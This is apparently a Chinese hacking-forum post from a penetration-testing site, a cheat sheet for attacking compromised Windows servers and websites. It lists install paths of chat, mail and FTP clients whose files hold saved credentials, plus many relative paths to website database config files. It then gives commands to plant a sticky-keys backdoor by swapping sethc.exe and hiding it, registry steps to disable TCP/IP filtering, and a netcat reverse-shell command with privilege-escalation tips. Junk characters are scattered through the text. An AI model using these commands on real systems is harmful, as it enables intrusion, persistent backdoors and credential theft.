2 I8 D8 b$ E  h! g$ S) d# ?5 D7 Jc:\Program Files\Tencent\qq2009\qq.exe
3 r1 s3 M' s( r2 V: Uc:\Program Files\Tencent\qq2008\qq.exe
, R0 Z8 e3 v5 F% C- o2 Q- T# q1 S. pc:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
3 N1 {* m( z$ C3 @, @2 rC:\Program Files\Foxmal\Foxmail.exe
& `# ]: N+ I" G9 N6 d, [; R' lC:\Program Files\Foxmal\accounts.cfg
C:\Program Files\tencent\Foxmal\Foxmail.exe
3 @2 W  p' I, ?. r3 w5 g& g8 C! @C:\Program Files\tencent\Foxmal\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
  i5 J5 X5 J0 t0 u0 y% Q6 i) t+ lc:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
% K$ |8 j6 k4 ^: b* VC:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
% ?* K8 R7 r5 v# x: `C:\Program Files\StormII\Storm.exe

0 b  Z' p# F1 X0 E3.网站相对路径:
4 Y' p- J& ]! {+ ?/ g! q$ c
0 `$ p/ N+ r; u- e' P/config.php
../../config.php
" ^0 \  j% z& c& w/ ~: X- Q6 V5 Y../config.php
../../../config.php
/config.inc.php
./config.inc.php
../../config.inc.php
7 ^. [' [5 Q0 w4 t+ v../config.inc.php
* M2 M( M, ]& [+ X( W" P* A../../../config.inc.php
/conn.php
/ ^3 D5 c, W5 _1 g6 n./conn.php
../../conn.php
- H" l4 }2 B) w1 o$ l) q../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
; @7 g$ V5 j' `; V4 I../conn.asp
( A" ?% D4 ^+ E% m! [../../../conn.asp
$ w. n! n# Z* ]& S/ J! \/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
$ Z5 |$ b. A! b2 s" S3 E& }- C5 ^+ g../../../config.inc.php
/config/config.php
, i- m: r: `& Y( ^../../config/config.php
../config/config.php
../../../config/config.php
/config/config.inc.php
- u$ W1 [4 M- |+ A. A( D& ^% ]./config/config.inc.php
  H: b. }3 b3 {. w../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
$ k+ z" A: A9 {# ?/config/conn.php
: u5 q0 @! t( S  u3 J0 P./config/conn.php
../../config/conn.php
../config/conn.php
../../../config/conn.php
4 m/ d) l* r6 k& F2 p/config/conn.asp
./config/conn.asp
' s& @, v: I1 [& j7 V../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
# a" E. A& D$ j" S./config/config.inc.php
../../config/config.inc.php
- x1 j9 h( }6 H& h$ @  I" z' u../config/config.inc.php
../../../config/config.inc.php
/data/config.php
../../data/config.php
" A  H5 I& G+ t5 G5 h' _../data/config.php
% w7 E) ]% [" o../../../data/config.php
/data/config.inc.php
( q/ c% V2 v: B. v# `3 _./data/config.inc.php
: M- q, ~, a& O4 s../../data/config.inc.php
6 b2 M6 a6 I- u3 m2 ?/ @* n4 E3 _../data/config.inc.php
- k! x: O. n4 D  k) Y- m  J3 ~3 w../../../data/config.inc.php
/data/conn.php
./data/conn.php
3 u# x- Q- S2 P! |, \0 ?+ f../../data/conn.php
  t" {  F  h7 d! o& F../data/conn.php
$ f# I+ u! _7 r$ D2 Y2 a8 y: b8 N$ I../../../data/conn.php
/data/conn.asp
./data/conn.asp
../../data/conn.asp
../data/conn.asp
../../../data/conn.asp
8 ]4 k3 t, |" }' b9 l. L% u( ]  P/data/config.inc.php
% O+ U9 N0 p0 d  |./data/config.inc.php
5 I1 _6 @* s8 m) k1 z1 p../../data/config.inc.php
../data/config.inc.php
  |" q0 h& x' F7 D& y../../../data/config.inc.php
/include/config.php
../../include/config.php
5 }2 B. ~! Y2 L% O$ C% p+ J5 {../include/config.php
../../../include/config.php
/include/config.inc.php
: |) A1 D4 ^" D& _$ C./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
# @& R2 @& }- ^3 B../../../include/config.inc.php
& c% L3 h* S( V/include/conn.php
./include/conn.php
0 Q' T2 \9 Y: `../../include/conn.php
$ G* g  \6 k. {; o2 F../include/conn.php
7 G8 r  d6 ?2 D* X../../../include/conn.php
6 C4 I: ?+ E" t  ^/ I, a' e/include/conn.asp
8 H" B1 Q  z- r% f( l9 C) X( ]./include/conn.asp
../../include/conn.asp
7 ?* h7 m& l! |../include/conn.asp
../../../include/conn.asp
1 o& z! T: F7 X: w  I; F. [$ D/include/config.inc.php
, {  X1 S0 J0 ^1 u4 U3 i3 I* V./include/config.inc.php
! o8 S" G/ q3 l5 j: K( X../../include/config.inc.php
0 ^3 v: F; D$ [+ R0 b( G../include/config.inc.php
5 {9 A/ f& s5 `# Y: C' _9 S! p../../../include/config.inc.php
/inc/config.php
1 T, e* N# a  L2 q../../inc/config.php
../inc/config.php
) G& @' \2 ?1 I, Z../../../inc/config.php
/inc/config.inc.php
+ {8 I1 S" Y$ w, [3 c./inc/config.inc.php
. b! d# A8 h; n8 N../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
( N( q  p# [: ?: r' l4 @/inc/conn.php
8 a* i3 {0 ^7 r6 r2 k% a4 S./inc/conn.php
3 |$ M2 O+ C; `! Y../../inc/conn.php
9 S, e8 @( Q2 e) A2 s. ]../inc/conn.php
7 {# S7 a2 a8 ]../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
9 T6 R6 u3 s1 l. U../../inc/conn.asp
../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
  f, I: ]% ^: n- p0 ~5 o) G../../../inc/config.inc.php
/ K% A$ S/ g, O9 i0 J3 S6 N/index.php
./index.php
../../index.php
../index.php
../../../index.php
' N1 J1 a+ D0 x" D9 i% Y* \$ X/index.asp
. X% b8 ~; O  ]6 ^! U./index.asp
! d: o2 u' V" @. N../../index.asp
- I5 I# ?! S+ M. ^$ T; e" P0 a../index.asp
../../../index.asp
替换SHIFT后门
　attrib c:\windows\system32\sethc.exe -h -r -s

4 l3 z# w+ N. [* C) Q' k6 @　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
# H6 @2 X1 x- s8 w$ `  J3 T
; a  \& g7 i' v- M# j8 h* m　　del c:\windows\system32\sethc.exe
- j$ ^/ i0 h! U0 W7 L
! i/ y% ^( c7 K% T# ~% d　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
, i5 @. }3 H, A2 G' X2 j+ J7 h0 ^
　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

　　attrib c:\windows\system32\sethc.exe +h +r +s

　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
: C/ J' d+ ^7 ?, j8 r- d去除TCPIP筛选
' [" U; a$ O3 V( Y% KTCP/IP筛选在注册表里有三处，分别是：
' e) O' @3 P! x$ J1 t* NHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
% V" s; r7 ?$ N" l8 z8 X' t* I( w" LHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

$ B8 F! @+ ?$ T2 d* B分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, m' v, k2 u! b( T3 @regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
* ~# ]  ?6 L* ?# C6 ^regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
9 `; m9 o. k4 M) l
* n" D* J5 f" ~: v2 G* x9 p然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000

再将以上三个文件分别用
. i' V: D  `8 ^$ X- ^( Vregedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
- H$ z2 g+ {9 }0 {- M  K7 L0 n导入注册表即可

5 d5 a, W% U6 X$ V4 S- @. M; cwebshell提权小技巧
cmd路径:
c:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell：
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
( N6 Q) @5 v5 T) P. m4 o4 o通常都不会成功。
7 w/ Q/ |  R9 y- }; a2 q6 ~
1 b& Q+ O) a, {+ s1 l; X! J而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
( y; t- Y( [6 S: A这个不是重点
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2